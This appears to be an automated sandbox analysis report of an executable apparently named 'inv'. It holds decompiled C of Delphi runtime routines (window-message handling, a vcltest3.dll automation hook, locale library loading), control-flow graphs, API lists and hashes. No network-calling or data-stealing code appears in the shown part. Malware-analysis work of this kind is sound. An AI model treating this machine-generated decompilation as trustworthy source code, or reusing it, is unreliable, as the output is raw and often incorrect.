44ab9c 56->81 82 44a5bb-44a5be 56->82 62 44aaa2-44aab5 call 44b0d4 57->62 63 44aa8a-44aa9d call 44b078 57->63 73 44a637-44a63a 58->73 74 44aa28-44aa36 IsIconic 58->74 59->26 59->28 60->67 62->50 63->50 86 44a661-44a671 65->86 87 44a5ea-44a5f0 65->87 66->50 92 44a9e9-44a9fb 66->92 68->50 69->50 70->50 94 44aa11-44aa23 70->94 89 44a91d-44a92a call 44af50 71->89 90 44a61a 71->90 72->50 73->37 91 44a640 73->91 74->50 95 44aa3c-44aa47 GetFocus 74->95 75->50 76->78 77->42 103 44ab47 78->103 79->50 97 44a5a4-44a5a7 80->97 98 44aae5-44ab09 call 436c38 call 44a3a4 call 44a410 80->98 81->50 99 44a5c4 82->99 100 44a848-44a854 82->100 111 44a673-44a678 86->111 112 44a67c-44a684 call 44abb8 86->112 106 44a5f6-44a5fb 87->106 107 44a800-44a827 SendMessageA 87->107 89->50 144 44a930-44a93a 89->144 90->78 91->78 92->50 94->50 95->50 114 44aa4d-44aa56 call 4422d0 95->114 116 44a5ad 97->116 117 44a72b-44a74c call 44a410 97->117 98->50 99->78 100->50 110 44a85a-44a864 100->110 103->50 105->50 147 44a973-44a982 call 4325a4 IsWindowVisible 105->147 121 44a601 106->121 122 44ab1e-44ab2a call 425850 call 425930 106->122 107->50 110->50 124 44a86a-44a874 110->124 126 44a689-44a691 call 44ac68 111->126 127 44a67a-44a69d call 44a410 111->127 112->50 114->50 153 44aa5c-44aa62 SetFocus 114->153 116->78 145 44a770-44a78d call 44a2a0 PostMessageA 117->145 146 44a74e-44a76b call 44a2b0 PostMessageA 117->146 121->78 122->50 170 44ab2c-44ab36 call 425850 call 42598c 122->170 136 44a876-44a892 call 40ca1c 124->136 137 44a8ef-44a8f7 124->137 126->50 127->50 165 44a8d4-44a8ea GetLastError 136->165 166 44a894-44a8b6 GetProcAddress 136->166 137->50 144->50 145->50 146->50 147->50 168 44a988-44a9d3 GetFocus call 4325a4 SetFocus call 42d05c SetFocus 147->168 153->50 165->50 166->50 169 44a8bc-44a8cf 166->169 168->50 169->50 170->50
                                  C-Code - Quality: 94%
                                  			E0044A498(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t161;
				struct HWND__* _t162;
				struct HWND__* _t163;
				void* _t166;
				struct HWND__* _t176;
				struct HWND__* _t185;
				struct HWND__* _t188;
				struct HWND__* _t189;
				struct HWND__* _t191;
				struct HWND__* _t197;
				struct HWND__* _t199;
				struct HWND__* _t202;
				struct HWND__* _t205;
				struct HWND__* _t206;
				struct HWND__* _t216;
				struct HWND__* _t217;
				struct HWND__* _t222;
				struct HWND__* _t224;
				struct HWND__* _t227;
				struct HWND__* _t231;
				struct HWND__* _t239;
				struct HWND__* _t247;
				struct HWND__* _t250;
				struct HWND__* _t254;
				struct HWND__* _t256;
				struct HWND__* _t257;
				struct HWND__* _t269;
				intOrPtr _t272;
				struct HWND__* _t275;
				intOrPtr* _t276;
				struct HWND__* _t284;
				struct HWND__* _t286;
				struct HWND__* _t297;
				void* _t306;
				signed int _t308;
				struct HWND__* _t314;
				struct HWND__* _t315;
				struct HWND__* _t316;
				void* _t317;
				intOrPtr _t340;
				struct HWND__* _t344;
				intOrPtr _t366;
				void* _t370;
				struct HWND__* _t375;
				void* _t376;
				void* _t377;
				intOrPtr _t378;

				_t317 = __ecx;
				_push(_t370);
				_v12 = __edx;
				_v8 = __eax;
				_push(_t377);
				_push(0x44ab52);
				_push( *[fs:edx]);
				 *[fs:edx] = _t378;
				 *(_v12 + 0xc) = 0;
				_t306 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
				if(_t306 < 0) {
					L5:
					E0044A34C(_v8, _t317, _v12);
					_t308 =  *_v12;
					_t161 = _t308;
					__eflags = _t161 - 0x53;
					if(__eflags > 0) {
						__eflags = _t161 - 0xb017;
						if(__eflags > 0) {
							__eflags = _t161 - 0xb020;
							if(__eflags > 0) {
								_t162 = _t161 - 0xb031;
								__eflags = _t162;
								if(_t162 == 0) {
									_t163 = _v12;
									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
									if( *((intOrPtr*)(_t163 + 4)) != 1) {
										 *(_v8 + 0xb0) =  *(_v12 + 8);
									} else {
										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
									}
									L102:
									_t166 = 0;
									_pop(_t340);
									 *[fs:eax] = _t340;
									goto L103;
								}
								__eflags = _t162 + 0xfffffff2 - 2;
								if(_t162 + 0xfffffff2 - 2 < 0) {
									 *(_v12 + 0xc) = E0044C464(_v8,  *(_v12 + 8), _t308) & 0x0000007f;
								} else {
									L101:
									E0044A410(_t377); // executed
								}
								goto L102;
							}
							if(__eflags == 0) {
								_t176 = _v12;
								__eflags =  *(_t176 + 4);
								if( *(_t176 + 4) != 0) {
									E0044B0D4(_v8, _t317,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								} else {
									E0044B078(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								}
								goto L102;
							}
							_t185 = _t161 - 0xb01a;
							__eflags = _t185;
							if(_t185 == 0) {
								_t188 = IsIconic( *(_v8 + 0x30));
								__eflags = _t188;
								if(_t188 == 0) {
									_t189 = GetFocus();
									_t344 = _v8;
									__eflags = _t189 -  *((intOrPtr*)(_t344 + 0x30));
									if(_t189 ==  *((intOrPtr*)(_t344 + 0x30))) {
										_t191 = E004422D0(0);
										__eflags = _t191;
										if(_t191 != 0) {
											SetFocus(_t191);
										}
									}
								}
								goto L102;
							}
							__eflags = _t185 == 5;
							if(_t185 == 5) {
								L89:
								E0044B538(_v8,  *(_v12 + 8),  *(_v12 + 4));
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t197 =  *(_v8 + 0x44);
							__eflags = _t197;
							if(_t197 != 0) {
								_t372 = _t197;
								_t199 = E004325A4(_t197);
								__eflags = _t199;
								if(_t199 != 0) {
									_t202 = IsWindowEnabled(E004325A4(_t372));
									__eflags = _t202;
									if(_t202 != 0) {
										_t205 = IsWindowVisible(E004325A4(_t372));
										__eflags = _t205;
										if(_t205 != 0) {
											 *0x44dc20 = 0;
											_t206 = GetFocus();
											SetFocus(E004325A4(_t372));
											E0042D05C(_t372,  *(_v12 + 4), 0x112,  *(_v12 + 8));
											SetFocus(_t206);
											 *0x44dc20 = 1;
											 *(_v12 + 0xc) = 1;
										}
									}
								}
							}
							goto L102;
						}
						__eflags = _t161 - 0xb000;
						if(__eflags > 0) {
							_t216 = _t161 - 0xb001;
							__eflags = _t216;
							if(_t216 == 0) {
								_t217 = _v8;
								__eflags =  *((short*)(_t217 + 0x10a));
								if( *((short*)(_t217 + 0x10a)) != 0) {
									 *((intOrPtr*)(_v8 + 0x108))();
								}
								goto L102;
							}
							__eflags = _t216 == 0x15;
							if(_t216 == 0x15) {
								_t222 = E0044AF50(_v8, _t317, _v12);
								__eflags = _t222;
								if(_t222 != 0) {
									 *(_v12 + 0xc) = 1;
								}
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t224 = _v8;
							__eflags =  *((short*)(_t224 + 0x112));
							if( *((short*)(_t224 + 0x112)) != 0) {
								 *((intOrPtr*)(_v8 + 0x110))();
							}
							goto L102;
						}
						_t227 = _t161 - 0x112;
						__eflags = _t227;
						if(_t227 == 0) {
							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
							__eflags = _t231;
							if(_t231 == 0) {
								E0044ABB8(_v8);
							} else {
								__eflags = _t231 == 0x100;
								if(_t231 == 0x100) {
									E0044AC68(_v8);
								} else {
									E0044A410(_t377);
								}
							}
							goto L102;
						}
						_t239 = _t227 + 0xffffffe0 - 7;
						__eflags = _t239;
						if(_t239 < 0) {
							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t308 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
							goto L102;
						}
						__eflags = _t239 == 0x1e1;
						if(_t239 == 0x1e1) {
							_t247 = E00425930(E00425850());
							__eflags = _t247;
							if(_t247 != 0) {
								E0042598C(E00425850());
							}
							goto L102;
						} else {
							goto L101;
						}
					}
					if(__eflags == 0) {
						goto L89;
					}
					__eflags = _t161 - 0x16;
					if(__eflags > 0) {
						__eflags = _t161 - 0x1d;
						if(__eflags > 0) {
							_t250 = _t161 - 0x37;
							__eflags = _t250;
							if(_t250 == 0) {
								 *(_v12 + 0xc) = E0044AB9C(_v8);
								goto L102;
							}
							__eflags = _t250 == 0x13;
							if(_t250 == 0x13) {
								_t254 = _v12;
								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) - 0xde534454;
								if( *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) == 0xde534454) {
									_t256 = _v8;
									__eflags =  *((char*)(_t256 + 0x9e));
									if( *((char*)(_t256 + 0x9e)) != 0) {
										_t257 = _v8;
										__eflags =  *(_t257 + 0xa0);
										if( *(_t257 + 0xa0) != 0) {
											 *(_v12 + 0xc) = 0;
										} else {
											_t314 = E0040CA1C("vcltest3.dll", _t308, 0x8000);
											 *(_v8 + 0xa0) = _t314;
											__eflags = _t314;
											if(_t314 == 0) {
												 *(_v12 + 0xc) = GetLastError();
												 *(_v8 + 0xa0) = 0;
											} else {
												 *(_v12 + 0xc) = 0;
												_t375 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
												_t315 = _t375;
												__eflags = _t375;
												if(_t375 != 0) {
													_t269 =  *(_v12 + 8);
													_t315->i( *((intOrPtr*)(_t269 + 4)),  *((intOrPtr*)(_t269 + 8)));
												}
											}
										}
									}
								}
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t272 =  *0x44fbb4; // 0x2191320
							E00449950(_t272);
							E0044A410(_t377);
							goto L102;
						}
						_t275 = _t161 - 0x1a;
						__eflags = _t275;
						if(_t275 == 0) {
							_t276 =  *0x44e0bc; // 0x44fb10
							E00436C38( *_t276, _t317,  *(_v12 + 4));
							E0044A3A4(_v8, _t308, _t317, _v12, _t370);
							E0044A410(_t377);
							goto L102;
						}
						__eflags = _t275 == 2;
						if(_t275 == 2) {
							E0044A410(_t377);
							_t284 = _v12;
							__eflags =  *((intOrPtr*)(_t284 + 4)) - 1;
							asm("sbb eax, eax");
							 *((char*)(_v8 + 0x9d)) = _t284 + 1;
							_t286 = _v12;
							__eflags =  *(_t286 + 4);
							if( *(_t286 + 4) == 0) {
								E0044A2A0();
								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
							} else {
								E0044A2B0(_v8);
								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
							}
							goto L102;
						} else {
							goto L101;
						}
					}
					if(__eflags == 0) {
						_t297 = _v12;
						__eflags =  *(_t297 + 4);
						if( *(_t297 + 4) != 0) {
							 *((char*)(_v8 + 0x9c)) = 1;
						}
						goto L102;
					}
					__eflags = _t161 - 0x14;
					if(_t161 > 0x14) {
						goto L101;
					}
					switch( *((intOrPtr*)(_t161 * 4 +  &M0044A53C))) {
						case 0:
							0 = E00418D24(0, __ebx, __edi, __esi);
							goto L102;
						case 1:
							goto L101;
						case 2:
							_push(0);
							_push(0);
							_push(0xb01a);
							_v8 =  *(_v8 + 0x30);
							_push( *(_v8 + 0x30));
							L004064B8();
							__eax = E0044A410(__ebp);
							goto L102;
						case 3:
							__eax = _v12;
							__eflags =  *(__eax + 4);
							if( *(__eax + 4) == 0) {
								__eax = E0044A410(__ebp);
								__eax = _v8;
								__eflags =  *(__eax + 0xac);
								if( *(__eax + 0xac) == 0) {
									__eax = _v8;
									__eax =  *(_v8 + 0x30);
									__eax = E00442180( *(_v8 + 0x30), __ebx, __edi, __esi);
									__edx = _v8;
									 *(_v8 + 0xac) = __eax;
								}
								_v8 = L0044A2A8();
							} else {
								_v8 = E0044A2B0(_v8);
								__eax = _v8;
								__eax =  *(_v8 + 0xac);
								__eflags = __eax;
								if(__eax != 0) {
									__eax = _v8;
									__edx = 0;
									__eflags = 0;
									 *(_v8 + 0xac) = 0;
								}
								__eax = E0044A410(__ebp);
							}
							goto L102;
						case 4:
							__eax = _v8;
							__eax =  *(_v8 + 0x30);
							_push(__eax);
							L00406428();
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E0044A410(__ebp);
							} else {
								__eax = E0044A44C(__ebp);
							}
							goto L102;
						case 5:
							__eax = _v8;
							__eax =  *(_v8 + 0x44);
							__eflags = __eax;
							if(__eax != 0) {
								__eax = E00447B50(__eax, __ecx);
							}
							goto L102;
						case 6:
							__eax = _v12;
							 *_v12 = 0x27;
							__eax = E0044A410(__ebp);
							goto L102;
					}
				} else {
					_t316 = _t306 + 1;
					_t376 = 0;
					L2:
					L2:
					if( *((intOrPtr*)(E00413524( *((intOrPtr*)(_v8 + 0xa8)), _t376)))() == 0) {
						goto L4;
					} else {
						_t166 = 0;
						_pop(_t366);
						 *[fs:eax] = _t366;
					}
					L103:
					return _t166;
					L4:
					_t376 = _t376 + 1;
					_t316 = _t316 - 1;
					__eflags = _t316;
					if(_t316 != 0) {
						goto L2;
					}
					goto L5;
				}
			}























































                                  0x0044a498
                                  0x0044a49f
                                  0x0044a4a1
                                  0x0044a4a4
                                  0x0044a4a9
                                  0x0044a4aa
                                  0x0044a4af
                                  0x0044a4b2
                                  0x0044a4ba
                                  0x0044a4c9
                                  0x0044a4cc
                                  0x0044a500
                                  0x0044a506
                                  0x0044a50e
                                  0x0044a510
                                  0x0044a512
                                  0x0044a515
                                  0x0044a5c9
                                  0x0044a5ce
                                  0x0044a61f
                                  0x0044a624
                                  0x0044a645
                                  0x0044a645
                                  0x0044a64a
                                  0x0044aaba
                                  0x0044aabd
                                  0x0044aac1
                                  0x0044aadd
                                  0x0044aac3
                                  0x0044aacf
                                  0x0044aacf
                                  0x0044ab48
                                  0x0044ab48
                                  0x0044ab4a
                                  0x0044ab4d
                                  0x00000000
                                  0x0044ab4d
                                  0x0044a653
                                  0x0044a656
                                  0x0044a915
                                  0x0044a65c
                                  0x0044ab41
                                  0x0044ab42
                                  0x0044ab47
                                  0x00000000
                                  0x0044a656
                                  0x0044a626
                                  0x0044aa81
                                  0x0044aa84
                                  0x0044aa88
                                  0x0044aab0
                                  0x0044aa8a
                                  0x0044aa98
                                  0x0044aa98
                                  0x00000000
                                  0x0044aa88
                                  0x0044a62c
                                  0x0044a62c
                                  0x0044a631
                                  0x0044aa2f
                                  0x0044aa34
                                  0x0044aa36
                                  0x0044aa3c
                                  0x0044aa41
                                  0x0044aa44
                                  0x0044aa47
                                  0x0044aa4f
                                  0x0044aa54
                                  0x0044aa56
                                  0x0044aa5d
                                  0x0044aa5d
                                  0x0044aa56
                                  0x0044aa47
                                  0x00000000
                                  0x0044aa36
                                  0x0044a637
                                  0x0044a63a
                                  0x0044aa67
                                  0x0044aa77
                                  0x00000000
                                  0x0044a640
                                  0x00000000
                                  0x0044a640
                                  0x0044a63a
                                  0x0044a5d0
                                  0x0044a942
                                  0x0044a945
                                  0x0044a947
                                  0x0044a94d
                                  0x0044a951
                                  0x0044a956
                                  0x0044a958
                                  0x0044a966
                                  0x0044a96b
                                  0x0044a96d
                                  0x0044a97b
                                  0x0044a980
                                  0x0044a982
                                  0x0044a988
                                  0x0044a98f
                                  0x0044a99e
                                  0x0044a9b7
                                  0x0044a9bd
                                  0x0044a9c2
                                  0x0044a9cc
                                  0x0044a9cc
                                  0x0044a982
                                  0x0044a96d
                                  0x0044a958
                                  0x00000000
                                  0x0044a947
                                  0x0044a5d6
                                  0x0044a5db
                                  0x0044a606
                                  0x0044a606
                                  0x0044a60b
                                  0x0044aa00
                                  0x0044aa03
                                  0x0044aa0b
                                  0x0044aa1d
                                  0x0044aa1d
                                  0x00000000
                                  0x0044aa0b
                                  0x0044a611
                                  0x0044a614
                                  0x0044a923
                                  0x0044a928
                                  0x0044a92a
                                  0x0044a933
                                  0x0044a933
                                  0x00000000
                                  0x0044a61a
                                  0x00000000
                                  0x0044a61a
                                  0x0044a614
                                  0x0044a5dd
                                  0x0044a9d8
                                  0x0044a9db
                                  0x0044a9e3
                                  0x0044a9f5
                                  0x0044a9f5
                                  0x00000000
                                  0x0044a9e3
                                  0x0044a5e3
                                  0x0044a5e3
                                  0x0044a5e8
                                  0x0044a66c
                                  0x0044a66c
                                  0x0044a671
                                  0x0044a67f
                                  0x0044a673
                                  0x0044a673
                                  0x0044a678
                                  0x0044a68c
                                  0x0044a67a
                                  0x0044a697
                                  0x0044a69c
                                  0x0044a678
                                  0x00000000
                                  0x0044a671
                                  0x0044a5ed
                                  0x0044a5ed
                                  0x0044a5f0
                                  0x0044a824
                                  0x00000000
                                  0x0044a824
                                  0x0044a5f6
                                  0x0044a5fb
                                  0x0044ab23
                                  0x0044ab28
                                  0x0044ab2a
                                  0x0044ab31
                                  0x0044ab31
                                  0x00000000
                                  0x0044a601
                                  0x00000000
                                  0x0044a601
                                  0x0044a5fb
                                  0x0044a51b
                                  0x00000000
                                  0x00000000
                                  0x0044a521
                                  0x0044a524
                                  0x0044a590
                                  0x0044a593
                                  0x0044a5b2
                                  0x0044a5b2
                                  0x0044a5b5
                                  0x0044a702
                                  0x00000000
                                  0x0044a702
                                  0x0044a5bb
                                  0x0044a5be
                                  0x0044a848
                                  0x0044a84e
                                  0x0044a854
                                  0x0044a85a
                                  0x0044a85d
                                  0x0044a864
                                  0x0044a86a
                                  0x0044a86d
                                  0x0044a874
                                  0x0044a8f4
                                  0x0044a876
                                  0x0044a885
                                  0x0044a88a
                                  0x0044a890
                                  0x0044a892
                                  0x0044a8dc
                                  0x0044a8e4
                                  0x0044a894
                                  0x0044a899
                                  0x0044a8b0
                                  0x0044a8b2
                                  0x0044a8b4
                                  0x0044a8b6
                                  0x0044a8bf
                                  0x0044a8cd
                                  0x0044a8cd
                                  0x0044a8b6
                                  0x0044a892
                                  0x0044a874
                                  0x0044a864
                                  0x00000000
                                  0x0044a5c4
                                  0x00000000
                                  0x0044a5c4
                                  0x0044a5be
                                  0x0044a595
                                  0x0044ab0b
                                  0x0044ab10
                                  0x0044ab16
                                  0x00000000
                                  0x0044ab1b
                                  0x0044a59b
                                  0x0044a59b
                                  0x0044a59e
                                  0x0044aaeb
                                  0x0044aaf2
                                  0x0044aafd
                                  0x0044ab03
                                  0x00000000
                                  0x0044ab08
                                  0x0044a5a4
                                  0x0044a5a7
                                  0x0044a72c
                                  0x0044a732
                                  0x0044a735
                                  0x0044a739
                                  0x0044a73f
                                  0x0044a745
                                  0x0044a748
                                  0x0044a74c
                                  0x0044a773
                                  0x0044a788
                                  0x0044a74e
                                  0x0044a751
                                  0x0044a766
                                  0x0044a766
                                  0x00000000
                                  0x0044a5ad
                                  0x00000000
                                  0x0044a5ad
                                  0x0044a5a7
                                  0x0044a526
                                  0x0044a82c
                                  0x0044a82f
                                  0x0044a833
                                  0x0044a83c
                                  0x0044a83c
                                  0x00000000
                                  0x0044a833
                                  0x0044a52c
                                  0x0044a52f
                                  0x00000000
                                  0x00000000
                                  0x0044a535
                                  0x00000000
                                  0x0044ab3a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044a70a
                                  0x0044a70c
                                  0x0044a70e
                                  0x0044a716
                                  0x0044a719
                                  0x0044a71a
                                  0x0044a720
                                  0x00000000
                                  0x00000000
                                  0x0044a792
                                  0x0044a795
                                  0x0044a799
                                  0x0044a7cd
                                  0x0044a7d3
                                  0x0044a7d6
                                  0x0044a7dd
                                  0x0044a7df
                                  0x0044a7e2
                                  0x0044a7e5
                                  0x0044a7ea
                                  0x0044a7ed
                                  0x0044a7ed
                                  0x0044a7f6
                                  0x0044a79b
                                  0x0044a79e
                                  0x0044a7a3
                                  0x0044a7a6
                                  0x0044a7ac
                                  0x0044a7ae
                                  0x0044a7b5
                                  0x0044a7b8
                                  0x0044a7b8
                                  0x0044a7ba
                                  0x0044a7ba
                                  0x0044a7c1
                                  0x0044a7c6
                                  0x00000000
                                  0x00000000
                                  0x0044a6ba
                                  0x0044a6bd
                                  0x0044a6c0
                                  0x0044a6c1
                                  0x0044a6c6
                                  0x0044a6c8
                                  0x0044a6d7
                                  0x0044a6ca
                                  0x0044a6cb
                                  0x0044a6d0
                                  0x00000000
                                  0x00000000
                                  0x0044a6a2
                                  0x0044a6a5
                                  0x0044a6a8
                                  0x0044a6aa
                                  0x0044a6b0
                                  0x0044a6b0
                                  0x00000000
                                  0x00000000
                                  0x0044a6e2
                                  0x0044a6e5
                                  0x0044a6ec
                                  0x00000000
                                  0x00000000
                                  0x0044a4ce
                                  0x0044a4ce
                                  0x0044a4cf
                                  0x00000000
                                  0x0044a4d1
                                  0x0044a4ed
                                  0x00000000
                                  0x0044a4ef
                                  0x0044a4ef
                                  0x0044a4f1
                                  0x0044a4f4
                                  0x0044a4f4
                                  0x0044ab67
                                  0x0044ab6d
                                  0x0044a4fc
                                  0x0044a4fc
                                  0x0044a4fd
                                  0x0044a4fd
                                  0x0044a4fe
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044a4fe

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RegisterAutomation$vcltest3.dll
                                  • API String ID: 0-2963190186
                                  • Opcode ID: 5d2a302009948e3392fbe4bfe91e2d3021bdb5a95cfd9adae1be494576ee754b
                                  • Instruction ID: 98e40f89fcf7c7cd0258f7c0bdfddfc3f2de7a2f607e1c3abfb557148d58e484
                                  • Opcode Fuzzy Hash: 5d2a302009948e3392fbe4bfe91e2d3021bdb5a95cfd9adae1be494576ee754b
                                  • Instruction Fuzzy Hash: A4E1A334A40244EFE700DF99C586A5EF7F2EF09314F5581A6E644AB352C738EE61DB0A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040517C, Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 215 40517c-4051ad lstrcpyn GetThreadLocale GetLocaleInfoA 216 4051b3-4051b7 215->216 217 405296-40529d 215->217 218 4051c3-4051d9 lstrlen 216->218 219 4051b9-4051bd 216->219 220 4051dc-4051df 218->220 219->217 219->218 221 4051e1-4051e9 220->221 222 4051eb-4051f3 220->222 221->222 223 4051db 221->223 222->217 224 4051f9-4051fe 222->224 223->220 225 405200-405226 lstrcpyn LoadLibraryExA 224->225 226 405228-40522a 224->226 225->226 226->217 227 40522c-405230 226->227 227->217 228 405232-405262 lstrcpyn LoadLibraryExA 227->228 228->217 229 405264-405294 lstrcpyn LoadLibraryExA 228->229 229->217
                                  C-Code - Quality: 61%
                                  			E0040517C() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L00401294();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L0040129C();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L00401294();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L00401294();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L00401294();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











                                  0x0040517c
                                  0x00405184
                                  0x0040518b
                                  0x0040518c
                                  0x0040519f
                                  0x004051a4
                                  0x004051ad
                                  0x00405296
                                  0x0040529d
                                  0x004051c3
                                  0x004051c3
                                  0x004051c9
                                  0x004051ca
                                  0x004051d7
                                  0x004051dc
                                  0x004051df
                                  0x004051db
                                  0x00000000
                                  0x004051db
                                  0x004051eb
                                  0x004051f3
                                  0x004051f9
                                  0x004051fe
                                  0x0040520b
                                  0x0040520f
                                  0x00405210
                                  0x00405211
                                  0x00405226
                                  0x00405226
                                  0x0040522a
                                  0x00405243
                                  0x00405247
                                  0x00405248
                                  0x00405249
                                  0x00405259
                                  0x0040525e
                                  0x00405262
                                  0x00405264
                                  0x00405279
                                  0x0040527d
                                  0x0040527e
                                  0x0040527f
                                  0x0040528f
                                  0x00405294
                                  0x00405294
                                  0x00405262
                                  0x0040522a
                                  0x00000000
                                  0x004051f3

                                  APIs
                                  • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 0040518C
                                  • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405199
                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 0040519F
                                  • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 004051CA
                                  • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405211
                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405221
                                  • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405249
                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405259
                                  • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 0040527F
                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 0040528F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                  • API String ID: 1599918012-2375825460
                                  • Opcode ID: af14c1e950c4dd8173092053fcf17151685b0ed4c58bd449b1b33e137c7d4652
                                  • Instruction ID: 2edec5a2f59f02892950df32a2288a9989bfbef1905e4320364365682ff0d217
                                  • Opcode Fuzzy Hash: af14c1e950c4dd8173092053fcf17151685b0ed4c58bd449b1b33e137c7d4652
                                  • Instruction Fuzzy Hash: 75316471E0065D2AEB25D6B8AC46FEF77AC9B04344F0441FBA604F62C1E67C9E848F54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044A410, Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
